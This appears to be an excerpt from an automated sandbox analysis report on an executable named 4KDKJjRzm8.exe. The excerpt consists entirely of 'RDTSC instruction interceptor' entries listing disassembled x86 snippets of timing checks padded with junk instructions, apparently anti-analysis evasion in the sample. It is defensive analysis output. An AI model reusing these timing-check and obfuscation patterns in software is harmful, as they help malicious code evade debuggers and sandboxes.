                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BED54B second address: BED550 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BED550 second address: BED571 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edi 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007FB3DD280BC3h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BED571 second address: BED58C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FB3DD3D95E6h 0x0000000a popad 0x0000000b js 00007FB3DD3D95F0h 0x00000011 jmp 00007FB3DD3D95EAh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BED58C second address: BED592 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BED8B2 second address: BED8B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BED8B8 second address: BED8D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB3DD280BC4h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BED8D5 second address: BED8D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BEDB81 second address: BEDB8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FB3DD280BB6h 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BF2F4C second address: BF2F54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BF2F54 second address: BF2F61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007FB3DD280BB6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BF20BF second address: BF20C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BF20C6 second address: BF20CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BF20CB second address: BF20D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FB3DD3D95E6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BF20D7 second address: BF20E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FB3DD280BB6h 0x0000000a popad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BF23B5 second address: BF23B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BF23B9 second address: BF241D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FB3DD280BC6h 0x0000000c jmp 00007FB3DD280BC6h 0x00000011 popad 0x00000012 popad 0x00000013 pushad 0x00000014 pushad 0x00000015 jmp 00007FB3DD280BBFh 0x0000001a jnl 00007FB3DD280BB6h 0x00000020 jmp 00007FB3DD280BC0h 0x00000025 pushad 0x00000026 popad 0x00000027 popad 0x00000028 pushad 0x00000029 pushad 0x0000002a popad 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BF2B47 second address: BF2B50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BFE45E second address: BFE462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BFE5CC second address: BFE5E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB3DD3D95EDh 0x00000009 jno 00007FB3DD3D95E6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BFE882 second address: BFE88B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BFE88B second address: BFE89D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD3D95EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BFECD5 second address: BFECFB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FB3DD280BBCh 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FB3DD280BC1h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BFECFB second address: BFED12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB3DD3D95F3h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BFF3AD second address: BFF3B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BFF3B1 second address: BFF3CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB3DD3D95F4h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BFF3CB second address: BFF3D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B4798F second address: B47993 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B47993 second address: B4799D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B4799D second address: B479A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B479A1 second address: B479B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jns 00007FB3DD280BB6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C078A8 second address: C078B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jno 00007FB3DD3D95E6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C078B4 second address: C078C0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C078C0 second address: C078C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C140A1 second address: C140AC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 js 00007FB3DD280BB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C140AC second address: C140B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C194AC second address: C194C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD280BC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C194C9 second address: C194CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C194CF second address: C194D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C194D7 second address: C194E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FB3DD3D95E6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C194E3 second address: C194E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C233D3 second address: C233D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C233D8 second address: C233E2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB3DD280BBEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C2D015 second address: C2D019 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C2D019 second address: C2D021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C2CEC0 second address: C2CEC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C33947 second address: C33985 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jnl 00007FB3DD280BB6h 0x0000000c jnp 00007FB3DD280BB6h 0x00000012 jmp 00007FB3DD280BC0h 0x00000017 popad 0x00000018 push eax 0x00000019 push esi 0x0000001a pop esi 0x0000001b pop eax 0x0000001c popad 0x0000001d pushad 0x0000001e jmp 00007FB3DD280BBDh 0x00000023 push eax 0x00000024 push edx 0x00000025 jno 00007FB3DD280BB6h 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C33985 second address: C33995 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007FB3DD3D95E6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C33AD5 second address: C33AED instructions: 0x00000000 rdtsc 0x00000002 je 00007FB3DD280BBCh 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jl 00007FB3DD280BB6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C33C6D second address: C33C77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FB3DD3D95E6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C33DFA second address: C33E00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C33E00 second address: C33E06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C343E3 second address: C343ED instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB3DD280BB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C388BB second address: C388C1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C38A25 second address: C38A29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C38A29 second address: C38A2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C38A2F second address: C38A40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007FB3DD280BB6h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C40EE9 second address: C40EED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C55244 second address: C55254 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007FB3DD280BB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C55254 second address: C5525E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FB3DD3D95E6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C5525E second address: C55271 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD280BBCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C55271 second address: C55279 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C54D84 second address: C54DB9 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB3DD280BB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c pop esi 0x0000000d jne 00007FB3DD280BB6h 0x00000013 pop eax 0x00000014 popad 0x00000015 pushad 0x00000016 push ecx 0x00000017 jmp 00007FB3DD280BC8h 0x0000001c push eax 0x0000001d pop eax 0x0000001e pop ecx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C54DB9 second address: C54DC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FB3DD3D95E6h 0x0000000a popad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C5830D second address: C58327 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD280BC4h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C58178 second address: C581B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD3D95F3h 0x00000007 js 00007FB3DD3D95E6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f je 00007FB3DD3D95F7h 0x00000015 push edx 0x00000016 pop edx 0x00000017 jmp 00007FB3DD3D95EFh 0x0000001c jng 00007FB3DD3D95EEh 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C6BD04 second address: C6BD16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FB3DD280BBCh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C6BD16 second address: C6BD1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C6BD1C second address: C6BD20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C6BE85 second address: C6BE98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007FB3DD3D95F2h 0x0000000b js 00007FB3DD3D95E6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C6BE98 second address: C6BEB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB3DD280BC0h 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C6BEB0 second address: C6BEB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C6BEB4 second address: C6BEB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C6C007 second address: C6C01F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB3DD3D95F0h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C6C01F second address: C6C02C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007FB3DD280BB6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C6C02C second address: C6C045 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB3DD3D95EBh 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007FB3DD3D95E6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C6C1A9 second address: C6C1AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C6C1AF second address: C6C1B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C6C1B3 second address: C6C1B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C6C1B7 second address: C6C204 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB3DD3D95F5h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jns 00007FB3DD3D95F2h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FB3DD3D95F5h 0x0000001b jc 00007FB3DD3D95E6h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C6EDB5 second address: C6EDBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C6EE5A second address: C6EE60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C6F394 second address: C6F398 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C7241A second address: C7243B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jne 00007FB3DD3D95E6h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FB3DD3D95EEh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C7243B second address: C7243F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C73EF8 second address: C73EFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C73EFE second address: C73F08 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB3DD280BB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52D0406 second address: 52D0418 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB3DD3D95EEh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52D0418 second address: 52D044A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD280BBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FB3DD280BC6h 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 push esi 0x00000015 mov bl, ADh 0x00000017 pop eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52D044A second address: 52D0467 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov edx, dword ptr [ebp+0Ch] 0x00000009 pushad 0x0000000a pushad 0x0000000b mov dh, 25h 0x0000000d push ecx 0x0000000e pop edi 0x0000000f popad 0x00000010 movzx eax, bx 0x00000013 popad 0x00000014 mov ecx, dword ptr [ebp+08h] 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52D0467 second address: 52D046B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52D046B second address: 52D047F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD3D95F0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52F0541 second address: 52F0545 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52F0545 second address: 52F054B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
